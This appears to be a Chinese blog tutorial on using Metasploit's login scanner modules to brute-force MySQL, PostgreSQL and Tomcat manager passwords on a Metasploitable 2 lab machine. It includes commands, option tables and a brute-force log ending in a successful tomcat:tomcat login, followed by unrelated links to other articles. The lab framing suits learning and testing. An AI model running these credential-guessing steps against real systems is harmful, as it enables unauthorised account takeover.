本文简要演示使用Metasploit 中的mysql_login、postgresql_login、tomcat_mgr_login模块暴力破解Metasploitable 2 上部署的服务。

Preface

  靶机: Metasploitable 2 下载地址

  攻击机: Kali 2 - xfce

MySQL演示流程

root@kali:~# msfconsole
msf > use auxiliary/scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > show options

  需要设置几个选项参数:

msf auxiliary(scanner/mysql/mysql_login) > set rhosts 192.168.1.110
rhosts => 192.168.1.110
msf auxiliary(scanner/mysql/mysql_login) > set user_file /root/user.txt
user_file => /root/user.txt
msf auxiliary(scanner/mysql/mysql_login) > set pass_file /root/pass.txt
pass_file => /root/pass.txt

  如下所示:

msf auxiliary(scanner/mysql/mysql_login) > show options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED yes How fast to bruteforce, from to
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /root/pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.110 yes The target address range or CIDR identifier
RPORT yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /root/user.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

  MySQL暴力破解使用的用户/密码字典自己提供。

  如下所示:

PostgreSQL演示流程

root@kali:~# msfconsole
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(scanner/postgres/postgres_login) > show options Module options (auxiliary/scanner/postgres/postgres_login): Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED yes How fast to bruteforce, from to
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS         yes The target address range or CIDR identifier
RPORT yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-seperated) users and passwords, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts

  这里只需要设置目标PostgreSQL的ip地址,USER_FILE和PASS_FILE使用默认进行测试,当然实际环境需要用自己的字典文件。

msf auxiliary(scanner/postgres/postgres_login) > set rhosts 192.168.1.110
rhosts => 192.168.1.110

  如图所示:

Tomcat 演示流程

   Tomcat管理后台http://ip:port/manager/html爆破,不多说。

msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(scanner/http/tomcat_mgr_login) > show options
...
msf auxiliary(scanner/http/tomcat_mgr_login) > set rhosts 192.168.1.110
rhosts => 192.168.1.110
msf auxiliary(scanner/http/tomcat_mgr_login) > set rport
rport =>

  需要设置两个重要选项:ip和port, 当然可以也提供自己的密码字典。

  破解过程如下所示:

msf auxiliary(scanner/http/tomcat_mgr_login) > exploit

[-] 192.168.1.110: - LOGIN FAILED: admin:admin (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: admin:manager (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: admin:role1 (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: admin:root (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: admin:tomcat (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: admin:s3cret (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: admin:vagrant (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: manager:admin (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: manager:manager (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: manager:role1 (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: manager:root (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: manager:tomcat (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: manager:s3cret (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: manager:vagrant (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: role1:admin (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: role1:manager (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: role1:role1 (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: role1:root (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: role1:tomcat (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: role1:s3cret (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: role1:vagrant (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: root:admin (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: root:manager (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: root:role1 (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: root:root (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: root:tomcat (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: root:s3cret (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: root:vagrant (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: tomcat:admin (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: tomcat:manager (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: tomcat:role1 (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.1.110: - Login Successful: tomcat:tomcat
[-] 192.168.1.110: - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: both:manager (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: both:role1 (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: both:root (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: both:tomcat (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: both:s3cret (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: both:vagrant (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: j2deployer:j2deployer (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: ovwebusr:OvW*busr1 (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: cxsdk:kdsxc (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: root:owaspbwa (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: ADMIN:ADMIN (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: xampp:xampp (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: QCC:QLogic66 (Incorrect)
[-] 192.168.1.110: - LOGIN FAILED: admin:vagrant (Incorrect)
[*] Scanned of hosts (% complete)
[*] Auxiliary module execution completed

  注意,其中有一行显示破解成功。

[+] 192.168.1.110: - Login Successful: tomcat:tomcat

  简单演示到这....

Metasploit 暴力破解演示的更多相关文章

  1. Pikachu的暴力破解演示-----基于表单的暴力破解

    1 首先打开XAMMP与burpsuite 2 打开游览器输入127.0.0.1:88进入pikachu,(由于我的端口有80改成88所以输入127.0.0.1:88要是没有更改80只需要输入127. ...

  2. 渗透实战(周六):Hydra&Metasploit暴力破解SSH登录口令

    一. SSH服务开启前基础配置 1.1 修改配置文件

  3. Linux 利用hosts.deny 防止暴力破解ssh(转)

    一.ssh暴力破解 利用专业的破解程序,配合密码字典.登陆用户名,尝试登陆服务器,来进行破解密码,此方法,虽慢,但却很有效果. 二.暴力破解演示 2.1.基础环境:2台linux主机(centos 7 ...

  4. Linux 利用hosts.deny 防止暴力破解ssh

    一.ssh暴力破解 利用专业的破解程序,配合密码字典.登陆用户名,尝试登陆服务器,来进行破解密码,此方法,虽慢,但却很有效果. 二.暴力破解演示 2.1.基础环境:2台linux主机(centos 7 ...

  5. 开源服务专题之------ssh防止暴力破解及fail2ban的使用方法

    15年出现的JAVA反序列化漏洞,另一个是redis配置不当导致机器入侵.只要redis是用root启动的并且未授权的话,就可以通过set方式直接写入一个authorized_keys到系统的/roo ...

  6. 利用Python自动生成暴力破解的字典

    Python是一款非常强大的语言.用于测试时它非常有效,因此Python越来越受到欢迎. 因此,在此次教程中我将聊一聊如何在Python中生成字典,并将它用于任何你想要的用途. 前提要求 1,Pyth ...

  7. Burpsuite教程与技巧之HTTP brute暴力破解

    Burpsuite教程与技巧之HTTP brute暴力破解 Gall @ WEB安全 2013-02-28 共 19052 人围观,发现 32 个不明物体收藏该文 感谢Gall投递 常规的对usern ...

  8. hydra暴力破解ssh服务器密码

    概述 我都没想到,第一次暴力破解服务器密码.竟然是对自己的单位服务器出手..囧,因为还没来得及找测试部要来服务器登录密码,测试部负责人已经下班走了.后来又联系不上,这要更新代码,怎么办..于是就对测试 ...

  9. 使用 fail2ban 防御 SSH 服务器的暴力破解攻击

    对于SSH服务的常见的攻击就是暴力破解攻击——远程攻击者通过不同的密码来无限次地进行登录尝试.当然SSH可以设置使用非密码验证验证方式来对抗这种攻击,例如公钥验证或者双重验证.将不同的验证方法的优劣处 ...

随机推荐

  1. orcle 如何快速插入百万千万条数据

    有时候做实验测试数据用到大量数据时可以用以下方法插入: 方法一:使用xmltable create table bqh8 as select rownum as id from xmltable('1 ...

  2. MFC 常用功能总结

    目录 ◆ 获取启动参数◆ 调整窗体大小◆ 关闭Dialog窗体◆ Dialog启动时指定控件为焦点◆ Dialog中禁止ESC回车关闭窗体◆ 回车后焦点自动跳到下一个控件◆ 窗体中某个控件捕获右键菜单 ...

  3. MySQL二进制日志文件Binlog的三种格式以及对应的主从复制中三种技术

    二进制日志文件Binlog的格式主要有三种: 1.Statement:基于SQL语句级别的Binlog,每条修改数据的SQL都会保存到Binlog里面. 2.ROW:基于行级别,每一行数据的变化都会记 ...

  4. 解决Win7(x64)Anaconda3报错:AttributeError: '_NamespacePath' object has no attribute 'sort'

    最近论文需要用到python做数据分析,python语法简单,但是Windows下安装第三方包恶心的要命,statsmodels用pip死活安装不上,网上查了说包相互依赖windows下的pip不能下 ...

  5. Drools实战系列(三)之eclipse创建工程

    web工程和maven工程是目前比较常用的,当然对现在而言,maven工程是开发中最常用的. 两种Drools项目的创建方式,一种是直接创建Drools项目,另一种是基于Maven创建Drools项目 ...

  6. 使用uploadify多文件上传,单个删除上传成功的图片

    总体思路:在用uploadify上传成功一张图片,用js生成相应的元素,放到指定的位置,并且加上删除的标志.在保存的时候,把是img的所有的值,放到对应到字段里. jsp: <tr> &l ...

  7. OpenCV——字符提取并保存

    截取图中上方数码管中的数字 基本思路: 1.将图像转化为灰度图 2.截取ROI区域 3.二值化 4.循环遍历每一行和每一列,得到字符的坐标 5.截取并保存 #include <opencv2/o ...

  8. drupal 7 连接多个数据库

    Drupal7系统,重写了数据库操作内核,其强大的功能无需多言.一次偶然的机会,需要提取Drupal默认安装数据库之外的一个数据库中的数据 ,可谓是绞尽脑汁,上网查阅最后终于找到了一个笨而又合适的方法 ...

  9. ORACLE SEQUENCE 具体解释

    1.    About Sequences(关于序列) 序列是数据库对象一种. 多个用户能够通过序列生成连续的数字以此来实现主键字段的自己主动.唯一增长,而且一个序列可为多列.多表同一时候使用. 序列 ...

  10. [Baltic 2011]Lamp BZOJ2346

    分析: 建图最短路,比较裸. 我们可以考虑,如果是‘\’那么,左上连右下边权为0,左下连右上边权为1,反之亦然. 卡裸spfa,加点优化能过,我就直接改成的堆优化Dijkstra 附上代码: #inc ...